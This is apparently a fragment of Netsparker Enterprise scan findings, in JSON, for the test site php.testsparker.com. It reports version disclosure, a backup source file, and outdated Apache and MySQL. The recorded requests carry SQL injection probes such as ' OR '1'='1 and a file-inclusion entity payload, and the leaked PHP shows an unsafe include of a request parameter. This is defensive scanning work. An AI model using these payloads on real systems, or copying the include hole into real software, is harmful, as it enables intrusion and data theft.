    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + }, + { + "Name": "Extracted Version", + "Value": "5.2.6" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "d765b64b-8f6a-4343-872d-ad48024dd723", + "Impact": "
    An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Version Disclosure (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "PhpVersionDisclosure", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 50, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "87", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "7.5" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "7.5" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "7.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "7.5" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "7.5" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "7.5" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "Cwe": "530", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A7", + "OwaspProactiveControls": "", + "Pci32": "6.5.8", + "Wasc": "34" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected backup source code on your web server.

    <?php\nrequire("auth.php");\nini_set("display_errors","0");\n\n//global configuration area\n$globals["title"] = "Netsparker Test Web Site -  PHP";\nfunction EndsWith($FullStr, $EndStr)\n{\n    // Get the length of the end string\n    $StrLen = strlen($EndStr);\n    // Look at the end of FullStr for the substring the size of EndStr\n    $FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen);\n    // If it matches, it does end with EndStr\n    return $FullStrEnd == $EndStr;\n}\n?>\n…\n<?php include "Internals/header.php"?>\n…\n<?php include "Internals/upmenu.php"?>\n…\n<?php\n            $file = $_REQUEST["file"];\n            if(EndsWith($file,".nsp"))\n                include $_REQUEST["file"];\n        ?>\n…\n<?php include "Internals/footer.php"?>
    ", + "ExploitationSkills": "
This is dependent on the information obtained from the source code. Uncovering these forms of vulnerabilities does not require a high level of skill. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application resides on.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "24/06/2021 10:07 AM", + "HttpRequest": { + "Content": "POST /process.bak HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nContent-Length: 124\r\nContent-Type: application/xml\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.bak\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n]>&lfi;", + "Method": "POST", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 834\r\nLast-Modified: Thu, 30 Jul 2020 08:09:20 GMT\r\nAccept-Ranges: bytes\r\nContent-Type: text/plain\r\nDate: Thu, 24 Jun 2021 22:55:27 GMT\r\nETag: \"1200000001ba62-342-5aba4307c6c00\"\r\n\r\n\n\n\n\n
    \n \n\t \n\t\n
    \n\n\n\t\n\n\n", + "Duration": 20.6716, + "StatusCode": 200 + }, + "LookupId": "3937a826-c79e-4b14-7696-ad5101871463", + "Impact": "
Depending on the nature of the source code disclosed, an attacker can mount one or more of the following types of attacks:
• Access the database or other data resources. With the privileges of the account obtained, attempt to read, update or delete arbitrary data from the database.
• Access password protected administrative mechanisms such as "dashboard", "management console" and "admin panel" potentially leading to full control of the application.
• Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:55 AM", + "Name": "Backup Source Code Detected", + "ProofOfConcept": "", + "RemedialActions": "
Remove all temporary and backup files.
    ", + "RemedialProcedure": "", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "BackupSourceCodeFound", + "Url": "http://php.testsparker.com/process.bak" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "C1", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified that you are using an out-of-date version of Apache.
    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "2.2.8" + }, + { + "Name": "Latest Version", + "Value": "2.4.48" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + }, + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "0e4d0f49-8783-4b29-8718-ad48024dd57e", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Low", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache 
HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Configuration Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Configuration Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server DEPRECATED: Code Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of CRLF Sequences ('CRLF Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Authentication Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Use After Free Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Improper Access Control Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Out-of-date Version (Apache)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of Apache to the latest stable version.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Present", + "Type": "ApacheOutOfDate", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.8" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.4" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.4" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified that you are using an out-of-date version of MySQL.
    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "5.0.51b" + }, + { + "Name": "Latest Version", + "Value": "8.0.25" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + } + ], + "FirstSeenDate": "16/06/2021 12:35 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "-1 OR 17-7=10", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nDate: Thu, 24 Jun 2021 22:51:27 GMT\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n\n
    Artist Service
    Results: -1 OR 17-7=10
    ID  Name  SURNAME  CREATION DATE
    2 NICK WAHLBERG 2006-02-15 04:34:33
    3 ED CHASE 2006-02-15 04:34:33
    4 JENNIFER DAVIS 2006-02-15 04:34:33
    5 JOHNNY LOLLOBRIGIDA 2006-02-15 04:34:33
    6 BETTE NICHOLSON 2006-02-15 04:34:33
    7 GRACE MOSTEL 2006-02-15 04:34:33
    8 MATTHEW JOHANSSON 2006-02-15 04:34:33
    9 JOE SWANK 2006-02-15 04:34:33
    10 CHRISTIAN GABLE 2006-02-15 04:34:33
    11 ZERO CAGE 2006-02-15 04:34:33
    12 KARL BERRY 2006-02-15 04:34:33
    13 UMA WOOD 2006-02-15 04:34:33
    14 VIVIEN BERGEN 2006-02-15 04:34:33
    15 CUBA OLIVIER 2006-02-15 04:34:33
    16 FRED COSTNER 2012-03-13 12:14:54 22
    17 HELEN VOIGHT 2012-03-13 12:14:54 22
    18 DAN TORN 2012-03-13 12:14:54 22
    19 BOB FAWCETT 2012-03-13 12:14:54 22
    20 LUCILLE TRACY 2012-03-13 12:14:54 22
    21 KIRSTEN PALTROW 2012-03-13 12:14:54 22
    22 ELVIS MARX 2012-03-13 12:14:54 22
    23 SANDRA KILMER 2012-03-13 12:14:54 22
    24 CAMERON STREEP 2012-03-13 12:14:54 22
    25 KEVIN BLOOM 2012-03-13 12:14:54 22
    26 RIP CRAWFORD 2012-03-13 12:14:54 22
    27 JULIA MCQUEEN 2012-03-13 12:14:54 22
    28 WOODY HOFFMAN 2012-03-13 12:14:54 22
    29 ALEC WAYNE 2012-03-13 12:14:54 22
    30 SANDRA PECK 2012-03-13 12:14:54 22
    31 SISSY SOBIESKI 2012-03-13 12:14:54 22
    32 TIM HACKMAN 2012-03-13 12:14:54 22
    33 MILLA PECK 2012-03-13 12:14:54 22
    34 AUDREY OLIVIER 2012-03-13 12:14:54 22
    35 JUDY DEAN 2012-03-13 12:14:54 22
    36 BURT DUKAKIS 2012-03-13 12:14:54 22
    37 VAL BOLGER 2012-03-13 12:14:54 22
    38 TOM MCKELLEN 2012-03-13 12:14:54 22
    39 GOLDIE BRODY 2012-03-13 12:14:54 22
    40 JOHNNY CAGE 2012-03-13 12:14:54 22
    41 JODIE DEGENERES 2012-03-13 12:14:54 22
    42 TOM MIRANDA 2012-03-13 12:14:54 22
    43 KIRK JOVOVICH 2012-03-13 12:14:54 22
    44 NICK STALLONE 2012-03-13 12:14:54 22
    45 REESE KILMER 2012-03-13 12:14:54 22
    46 PARKER GOLDBERG 2012-03-13 12:14:54 22
    47 JULIA BARRYMORE 2012-03-13 12:14:54 22
    48 FRANCES DAY-LEWIS 2012-03-13 12:14:54 22
    49 ANNE CRONYN 2012-03-13 12:14:54 22
    50 NATALIE HOPKINS 2012-03-13 12:14:54 22
    51 GARY PHOENIX 2012-03-13 12:14:54 22
    52 CARMEN HUNT 2012-03-13 12:14:54 22
    53 MENA TEMPLE 2012-03-13 12:14:54 22
    54 PENELOPE PINKETT 2012-03-13 12:14:54 22
    55 FAY KILMER 2012-03-13 12:14:54 22
    56 DAN HARRIS 2012-03-13 12:14:54 22
    57 JUDE CRUISE 2012-03-13 12:14:54 22
    58 CHRISTIAN AKROYD 2012-03-13 12:14:54 22
    59 DUSTIN TAUTOU 2012-03-13 12:14:54 22
    60 HENRY BERRY 2012-03-13 12:14:54 22
    61 CHRISTIAN NEESON 2012-03-13 12:14:54 22
    62 JAYNE NEESON 2012-03-13 12:14:54 22
    63 CAMERON WRAY 2012-03-13 12:14:54 22
    64 RAY JOHANSSON 2012-03-13 12:14:54 22
    65 ANGELA HUDSON 2012-03-13 12:14:54 22
    66 MARY TANDY 2012-03-13 12:14:54 22
    67 JESSICA BAILEY 2012-03-13 12:14:54 22
    68 RIP WINSLET 2012-03-13 12:14:54 22
    69 KENNETH PALTROW 2012-03-13 12:14:54 22
    70 MICHELLE MCCONAUGHEY 2012-03-13 12:14:54 22
    71 ADAM GRANT 2012-03-13 12:14:54 22
    72 SEAN WILLIAMS 2012-03-13 12:14:54 22
    73 GARY PENN 2012-03-13 12:14:54 22
    74 MILLA KEITEL 2012-03-13 12:14:54 22
    75 BURT POSEY 2012-03-13 12:14:54 22
    76 ANGELINA ASTAIRE 2012-03-13 12:14:54 22
    77 CARY MCCONAUGHEY 2012-03-13 12:14:54 22
    78 GROUCHO SINATRA 2012-03-13 12:14:54 22
    79 MAE HOFFMAN 2012-03-13 12:14:54 22
    80 RALPH CRUZ 2012-03-13 12:14:54 22
    81 SCARLETT DAMON 2012-03-13 12:14:54 22
    82 WOODY JOLIE 2012-03-13 12:14:54 22
    83 BEN WILLIS 2012-03-13 12:14:54 22
    84 JAMES PITT 2012-03-13 12:14:54 22
    85 MINNIE ZELLWEGER 2012-03-13 12:14:54 22
    86 GREG CHAPLIN 2012-03-13 12:14:54 22
    87 SPENCER PECK 2012-03-13 12:14:54 22
    88 KENNETH PESCI 2012-03-13 12:14:54 22
    89 CHARLIZE DENCH 2012-03-13 12:14:54 22
    90 SEAN GUINESS 2012-03-13 12:14:54 22
    91 CHRISTOPHER BERRY 2012-03-13 12:14:54 22
    92 KIRSTEN AKROYD 2012-03-13 12:14:54 22
    93 ELLEN PRESLEY 2012-03-13 12:14:54 22
    94 KENNETH TORN 2012-03-13 12:14:54 22
    95 DARYL WAHLBERG 2012-03-13 12:14:54 22
    96 GENE WILLIS 2012-03-13 12:14:54 22
    97 MEG HAWKE 2012-03-13 12:14:54 22
    98 CHRIS BRIDGES 2012-03-13 12:14:54 22
    99 JIM MOSTEL 2012-03-13 12:14:54 22
    100 SPENCER DEPP 2012-03-13 12:14:54 22
    101 SUSAN DAVIS 2012-03-13 12:14:54 22
    102 WALTER TORN 2012-03-13 12:14:54 22
    103 MATTHEW LEIGH 2012-03-13 12:14:54 22
    104 PENELOPE CRONYN 2012-03-13 12:14:54 22
    105 SIDNEY CROWE 2012-03-13 12:14:54 22
    106 GROUCHO DUNST 2012-03-13 12:14:54 22
    107 GINA DEGENERES 2012-03-13 12:14:54 22
    108 WARREN NOLTE 2012-03-13 12:14:54 22
    109 SYLVESTER DERN 2012-03-13 12:14:54 22
    110 SUSAN DAVIS 2012-03-13 12:14:54 22
    111 CAMERON ZELLWEGER 2012-03-13 12:14:54 22
    112 RUSSELL BACALL 2012-03-13 12:14:54 22
    113 MORGAN HOPKINS 2012-03-13 12:14:54 22
    114 MORGAN MCDORMAND 2012-03-13 12:14:54 22
    115 HARRISON BALE 2012-03-13 12:14:54 22
    116 DAN STREEP 2012-03-13 12:14:54 22
    117 RENEE TRACY 2012-03-13 12:14:54 22
    118 CUBA ALLEN 2012-03-13 12:14:54 22
    119 WARREN JACKMAN 2012-03-13 12:14:54 22
    120 PENELOPE MONROE 2012-03-13 12:14:54 22
    121 LIZA BERGMAN 2012-03-13 12:14:54 22
    122 SALMA NOLTE 2012-03-13 12:14:54 22
    123 JULIANNE DENCH 2012-03-13 12:14:54 22
    124 SCARLETT BENING 2012-03-13 12:14:54 22
    125 ALBERT NOLTE 2012-03-13 12:14:54 22
    126 FRANCES TOMEI 2012-03-13 12:14:54 22
    127 KEVIN GARLAND 2012-03-13 12:14:54 22
    128 CATE MCQUEEN 2012-03-13 12:14:54 22
    129 DARYL CRAWFORD 2012-03-13 12:14:54 22
    130 GRETA KEITEL 2012-03-13 12:14:54 22
    131 JANE JACKMAN 2012-03-13 12:14:54 22
    132 ADAM HOPPER 2012-03-13 12:14:54 22
    133 RICHARD PENN 2012-03-13 12:14:54 22
    134 GENE HOPKINS 2012-03-13 12:14:54 22
    135 RITA REYNOLDS 2012-03-13 12:14:54 22
    136 ED MANSFIELD 2012-03-13 12:14:54 22
    137 MORGAN WILLIAMS 2012-03-13 12:14:54 22
    138 LUCILLE DEE 2012-03-13 12:14:54 22
    139 EWAN GOODING 2012-03-13 12:14:54 22
    140 WHOOPI HURT 2012-03-13 12:14:54 22
    141 CATE HARRIS 2012-03-13 12:14:54 22
    142 JADA RYDER 2012-03-13 12:14:54 22
    143 RIVER DEAN 2012-03-13 12:14:54 22
    144 ANGELA WITHERSPOON 2012-03-13 12:14:54 22
    145 KIM ALLEN 2012-03-13 12:14:54 22
    146 ALBERT JOHANSSON 2012-03-13 12:14:54 22
    147 FAY WINSLET 2012-03-13 12:14:54 22
    148 EMILY DEE 2012-03-13 12:14:54 22
    149 RUSSELL TEMPLE 2012-03-13 12:14:54 22
    150 JAYNE NOLTE 2012-03-13 12:14:54 22
    151 GEOFFREY HESTON 2012-03-13 12:14:54 22
    152 BEN HARRIS 2012-03-13 12:14:54 22
    153 MINNIE KILMER 2012-03-13 12:14:54 22
    154 MERYL GIBSON 2012-03-13 12:14:54 22
    155 IAN TANDY 2012-03-13 12:14:54 22
    156 FAY WOOD 2012-03-13 12:14:54 22
    157 GRETA MALDEN 2012-03-13 12:14:54 22
    158 VIVIEN BASINGER 2012-03-13 12:14:54 22
    159 LAURA BRODY 2012-03-13 12:14:54 22
    160 CHRIS DEPP 2012-03-13 12:14:54 22
    161 HARVEY HOPE 2012-03-13 12:14:54 22
    162 OPRAH KILMER 2012-03-13 12:14:54 22
    163 CHRISTOPHER WEST 2012-03-13 12:14:54 22
    164 HUMPHREY WILLIS 2012-03-13 12:14:54 22
    165 AL GARLAND 2012-03-13 12:14:54 22
    166 NICK DEGENERES 2012-03-13 12:14:54 22
    167 LAURENCE BULLOCK 2012-03-13 12:14:54 22
    168 WILL WILSON 2012-03-13 12:14:54 22
    169 KENNETH HOFFMAN 2012-03-13 12:14:54 22
    170 MENA HOPPER 2012-03-13 12:14:54 22
    171 OLYMPIA PFEIFFER 2012-03-13 12:14:54 22
    172 GROUCHO WILLIAMS 2012-03-13 12:14:54 22
    173 ALAN DREYFUSS 2012-03-13 12:14:54 22
    174 MICHAEL BENING 2012-03-13 12:14:54 22
    175 WILLIAM HACKMAN 2012-03-13 12:14:54 22
    176 JON CHASE 2012-03-13 12:14:54 22
    177 GENE MCKELLEN 2012-03-13 12:14:54 22
    178 LISA MONROE 2012-03-13 12:14:54 22
    179 ED GUINESS 2012-03-13 12:14:54 22
    180 JEFF SILVERSTONE 2012-03-13 12:14:54 22
    181 MATTHEW CARREY 2012-03-13 12:14:54 22
    182 DEBBIE AKROYD 2012-03-13 12:14:54 22
    183 RUSSELL CLOSE 2012-03-13 12:14:54 22
    184 HUMPHREY GARLAND 2012-03-13 12:14:54 22
    185 MICHAEL BOLGER 2012-03-13 12:14:54 22
    186 JULIA ZELLWEGER 2012-03-13 12:14:54 22
    187 RENEE BALL 2012-03-13 12:14:54 22
    188 ROCK DUKAKIS 2012-03-13 12:14:54 22
    189 CUBA BIRCH 2012-03-13 12:14:54 22
    190 AUDREY BAILEY 2012-03-13 12:14:54 22
    191 GREGORY GOODING 2012-03-13 12:14:54 22
    192 JOHN SUVARI 2012-03-13 12:14:54 22
    193 BURT TEMPLE 2012-03-13 12:14:54 22
    194 MERYL ALLEN 2012-03-13 12:14:54 22
    195 JAYNE SILVERSTONE 2012-03-13 12:14:54 22
    196 BELA WALKEN 2012-03-13 12:14:54 22
    197 REESE WEST 2012-03-13 12:14:54 22
    198 MARY KEITEL 2012-03-13 12:14:54 22
    199 JULIA FAWCETT 2012-03-13 12:14:54 22
    200 THORA TEMPLE 2012-03-13 12:14:54 22
    412 -1 OR 1=1 test 2012-03-13 12:14:54 22
    413 -1 OR 1=1 test 2012-03-13 12:14:54 22
    414 NS1NO test 2012-03-13 12:14:54 22
    415 1 AND 'NS='ss test 2012-03-13 12:14:54 22
    416 ' OR 'ns'='ns test 2012-03-13 12:14:54 22
    417 -1 OR 17-7=10 test 2012-03-13 12:14:54 22
    418 1 OR X='ss test 2012-03-13 12:14:54 22
    419 ' OR '1'='1 test 2012-03-13 12:14:54 22
    420 ' OR '1'='1 test 2012-03-13 12:14:54 22

    Tags
    netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion
    Inner Pages
    Links
    This website is automatically reset at every midnight (00:00 - UTC).
    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.
    ", + "Duration": 180.5509, + "StatusCode": 200 + }, + "LookupId": "b89d9038-b732-471a-657c-ad49020ee0ad", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
